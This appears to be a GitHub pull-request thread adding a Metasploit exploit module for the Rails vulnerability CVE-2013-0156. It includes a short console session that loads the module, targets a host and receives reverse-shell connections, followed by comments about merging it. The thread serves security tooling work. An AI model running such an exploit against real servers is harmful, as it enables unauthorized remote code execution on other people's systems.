Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Already on GitHub? Sign in to your account

Add exploit module for CVE-2013-0156 #1281

wants to merge 3 commits into


None yet
4 participants

espes commented Jan 10, 2013

For no reason other than to beat you to it ;)
(hdmoore claimed they were pushing their own module in a couple hours time)

Tested with ruby 1.9.3 on Rails 3.2.10. Can probably be made to work on older ruby+rails versions, particularly using Gem::Requirement restricts it to 1.9.?.

A variation of @benmmurphy's payload is used, which he may or may not be comfortable with. I figure it's not too difficult to come up with independently and my/@charliesome's hack would just be replaced by something similar eventually.

msf > use exploits/unix/webapp/rails_xml_parsing_exec
msf  exploit(rails_xml_parsing_exec) > set RHOST
msf  exploit(rails_xml_parsing_exec) > exploit

[*] Started reverse double handler
[*] Sent exploit request
[*] Accepted the first client connection...
[*] Accepted the second client connection...

hdm commented Jan 10, 2013

Thanks! Closing this out and will merge your work into the module in progress that uses ARCH_RUBY payloads

haha this is going to be a shitshow...



hdm commented Jan 10, 2013

See #1282 for the merged version of this module

@hdm hdm closed this Jan 10, 2013

Karimus commented Jan 11, 2013

incoming shitstorm expected :)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment